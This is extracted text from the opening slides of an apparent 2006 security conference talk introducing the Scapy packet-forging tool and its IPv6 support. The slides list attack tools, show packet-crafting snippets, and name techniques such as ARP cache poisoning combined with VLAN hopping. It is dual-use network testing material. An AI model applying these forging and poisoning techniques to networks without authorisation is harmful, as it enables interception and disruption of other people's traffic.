![Page 1: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/1.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Scapy and IPv6 networking
Philippe BIONDI Arnaud EBALARD
phil(at)secdev.org / philippe.biondi(at)eads.net
troglocan(at)droids-corp.org / arnaud.ebalard(at)eads.net
EADS Corporate Research Center — DCR/STI/CIT Sec lab
Suresnes, FRANCE
Hack In The Box 2006
P. Biondi / A. Ebalard Scapy and IPv6 networking 1/100
![Page 2: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/2.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Beware! IPv6 is coming, and it is not happy!
The everything is connected world needs IPv6, but
IPv6 sometimes looks simple and it is complex
Many implementation bugs are waiting undercover
Best practices painfully acquired for IPv4 are not there yet forIPv6
Let’s make something cool and we’ll secure it later mentality
We need test tools to
Emerge best practices
Hunt bugs
Demonstrate flaws
Show actual risks
P. Biondi / A. Ebalard Scapy and IPv6 networking 2/100
![Page 3: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/3.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Beware! IPv6 is coming, and it is not happy!
The everything is connected world needs IPv6, but
IPv6 sometimes looks simple and it is complex
Many implementation bugs are waiting undercover
Best practices painfully acquired for IPv4 are not there yet forIPv6
Let’s make something cool and we’ll secure it later mentality
We need test tools to
Emerge best practices
Hunt bugs
Demonstrate flaws
Show actual risks
P. Biondi / A. Ebalard Scapy and IPv6 networking 2/100
![Page 4: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/4.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 3/100
![Page 5: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/5.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Quick goal-oriented taxonomy of packet building tools
Packet forging Sniffing
Testing
Scanning Fingerprinting
Attacking
P. Biondi / A. Ebalard Scapy and IPv6 networking 4/100
![Page 6: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/6.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Many programsSorry for possible classification errors !
Sniffing tools
ethereal, tcpdump, net2pcap, cdpsniffer, aimsniffer, vomit,tcptrace, tcptrack, nstreams, argus, karpski, ipgrab, nast, cdpr,aldebaran, dsniff, irpas, iptraf, . . .
Packet forging tools
packeth, packit, packet excalibur, nemesis, tcpinject, libnet, IPsorcery, pacgen, arp-sk, arpspoof, dnet, dpkt, pixiliate, irpas,sendIP, IP-packetgenerator, sing, aicmpsend, libpal, . . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 5/100
![Page 7: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/7.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Many programs
Testing tools
ping, hping2, hping3, traceroute, tctrace, tcptraceroute,traceproto, fping, arping, . . .
Scanning tools
nmap, amap, vmap, hping3, unicornscan, ttlscan, ikescan, paketto,firewalk, . . .
Fingerprinting tools
nmap, xprobe, p0f, cron-OS, queso, ikescan, amap, synscan, . . .
Attacking tools
dnsspoof, poison ivy, ikeprobe, ettercap, dsniff suite, cain, hunt,airpwn, irpas, nast, yersinia, . . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 6/100
![Page 8: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/8.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools can’t forge exactly what you want
Most tools support no more than the TCP/IP protocol suite
Building a whole packet with a command line tool is nearunbearable, and is really unbearable for a set of packets
=⇒ Popular tools use templates or scenarii with few fields to fill toget a working (set of) packets
=⇒ You’ll never do something the author did not imagine
=⇒ You often need to write a new tool
j But building a single working packet from scratch in C takesan average of 60 lines
P. Biondi / A. Ebalard Scapy and IPv6 networking 7/100
![Page 9: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/9.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Combining technics is not possible
Example
Imagine you have an ARP cache poisoning tool
Imagine you have a double 802.1q encapsulation tool
=⇒ You still can’t do ARP cache poisoning with double 802.1qencapsulation
=⇒ You need to write a new tool ... again.
P. Biondi / A. Ebalard Scapy and IPv6 networking 8/100
![Page 10: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/10.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools can’t forge exactly what you want
Example
Try to find a tool that can do
an ICMP echo request with some given padding data
an IP protocol scan with the More Fragments flag
some ARP cache poisoning with a VLAN hopping attack
a traceroute with an applicative payload (DNS, ISAKMP, etc.)
P. Biondi / A. Ebalard Scapy and IPv6 networking 9/100
![Page 11: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/11.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Decoding vs interpreting
decoding: I received a RST packet from port 80
interpreting: The port 80 is closed
Machines are good at decoding and can help human beings
Interpretation is for human beings
P. Biondi / A. Ebalard Scapy and IPv6 networking 10/100
![Page 12: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/12.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered
Port 113 is closed.
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 13: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/13.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered
Port 113 is closed.
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 14: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/14.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered WRONG! it was an host unreachable error.The firewall wanted the packet to go through but no hostanswered the ARP request.
Port 113 is closed.
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 15: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/15.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situationsWork with basic logic and reasoningLimited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered WRONG! it was an host unreachable error.The firewall wanted the packet to go through but no hostanswered the ARP request.
Port 113 is closed. WRONG! the port is actually open on thebox but the router before it spoofed a TCP reset
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 16: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/16.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 17: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/17.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 18: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/18.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 19: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/19.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 20: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/20.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 21: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/21.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
Did you see ?
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 22: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/22.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
Did you see ? Some data leaked into the padding (Etherleaking).
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 23: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/23.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Popular tools bias our perception of networked systems
Very few popular tools (nmap, hping)
Popular tools give a subjective vision of tested systems
=⇒ The world is seen only through those tools
=⇒ You won’t notice what they can’t see
=⇒ Bugs, flaws, . . . may remain unnoticed on very well testedsystems because they are always seen through the same tools,with the same bias
P. Biondi / A. Ebalard Scapy and IPv6 networking 13/100
![Page 24: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/24.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 14/100
![Page 25: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/25.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Scapy ’s Main Concepts
Python interpreter disguised as a Domain Specific Language
Extensible design
Fast packet designing
Default values that work
No special values
Unlimited combinations
Probe once, interpret many
Interactive packet and result manipulation
P. Biondi / A. Ebalard Scapy and IPv6 networking 15/100
![Page 26: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/26.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Scapy as a Domain Specific Language
List of layers
>>> ls()
ARP : ARP
DHCP : DHCP options
DNS : DNS
Dot11 : 802.11
[...]
List of commands
>>> lsc()
sr : Send and receive packets at layer 3
sr1 : Send packets at layer 3 and return only the fi
srp : Send and receive packets at layer 2
[...]
P. Biondi / A. Ebalard Scapy and IPv6 networking 16/100
![Page 27: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/27.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Extensible design
One use (others)
Core+2 or 3 layers
+1 technique
Many uses (Scapy)
Technics
Core Layers
custom
Scapy is not monolithic
The core is responsible for packetassembly mechanisms, interactionswith the kernel, etc.
The layer part describes layers
The techniques part relies on coreand layers.
When the core improves, allexisting layers take advantage of it.
When new layers are added, theyimmediately benefit from the core.
P. Biondi / A. Ebalard Scapy and IPv6 networking 17/100
![Page 28: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/28.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Extensible design
One use (others)
Core+2 or 3 layers
+1 technique
Many uses (Scapy)
Technics
Core Layers
custom
Scapy is not monolithic
The core is responsible for packetassembly mechanisms, interactionswith the kernel, etc.
The layer part describes layers
The techniques part relies on coreand layers.
When the core improves, allexisting layers take advantage of it.
When new layers are added, theyimmediately benefit from the core.
P. Biondi / A. Ebalard Scapy and IPv6 networking 17/100
![Page 29: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/29.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Fast packet designing
Each packet is built layer by layer (ex: Ether, IP, TCP, . . . )
Each layer can be stacked on another
Each layer or packet can be manipulated
Each field has working default values
Each field can contain a value or a set of values
Example
>>> a=IP(dst="www.target.com", id=0x42)
>>> a.ttl=12
>>> b=TCP(dport=[22,23,25,80,443])
>>> c=a/b
P. Biondi / A. Ebalard Scapy and IPv6 networking 18/100
![Page 30: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/30.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Fast packet designing
How to order food at a Fast Food
I want a BigMac, French Fries with Ketchup and Mayonnaise, upto 9 Chicken Wings and a Diet Coke
How to order a Packet with Scapy
I want a broadcast MAC address, and IP payload to ketchup.comand to mayo.com, TTL value from 1 to 9, and an UDP payload.
Ether(dst="ff:ff:ff:ff:ff:ff")
/IP(dst=["ketchup.com","mayo.com"],ttl=(1,9))
/UDP()
We have 18 packets defined in 1 line (1 implicit packet)
P. Biondi / A. Ebalard Scapy and IPv6 networking 19/100
![Page 31: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/31.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Fast packet designing
How to order food at a Fast Food
I want a BigMac, French Fries with Ketchup and Mayonnaise, upto 9 Chicken Wings and a Diet Coke
How to order a Packet with Scapy
I want a broadcast MAC address, and IP payload to ketchup.comand to mayo.com, TTL value from 1 to 9, and an UDP payload.
Ether(dst="ff:ff:ff:ff:ff:ff")
/IP(dst=["ketchup.com","mayo.com"],ttl=(1,9))
/UDP()
We have 18 packets defined in 1 line (1 implicit packet)
P. Biondi / A. Ebalard Scapy and IPv6 networking 19/100
![Page 32: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/32.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Default values that work
If not overriden,
IP source is chosen according to destination and routing table
Checksum is computed
Source MAC is chosen according to output interface
Ethernet type and IP protocol are determined by upper layer
. . .
Other fields’ default values are chosen to be the most useful ones:
TCP source port is 20, destination port is 80
UDP source and destination ports are 53
ICMP type is echo request
. . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 20/100
![Page 33: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/33.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Default values that work
Example : Default Values for IP
>>> ls(IP)
version : BitField = (4)
ihl : BitField = (None)
tos : XByteField = (0)
len : ShortField = (None)
id : ShortField = (1)
flags : FlagsField = (0)
frag : BitField = (0)
ttl : ByteField = (64)
proto : ByteEnumField = (0)
chksum : XShortField = (None)
src : Emph = (None)
dst : Emph = (’127.0.0.1’)
options : IPoptionsField = (’’)
P. Biondi / A. Ebalard Scapy and IPv6 networking 21/100
![Page 34: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/34.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
No special values
The special value is the None object
The None object is outside of the set of possible values
=⇒ do not prevent a possible value to be used
P. Biondi / A. Ebalard Scapy and IPv6 networking 22/100
![Page 35: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/35.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Unlimited combinations
With Scapy , you can
Stack what you want where you want
Put any value you want in any field you want
Example
STP()/IP(options="love",chksum=0x1234)
/Dot1Q(prio=1)/Ether(type=0x1234)
/Dot1Q(vlan=(2,123))/TCP()
You know ARP cache poisonning and vlan hopping
=⇒ you can poison a cache with a double VLAN encapsulation
You know VOIP decoding, 802.11 and WEP
=⇒ you can decode a WEP encrypted 802.11 VOIP capture
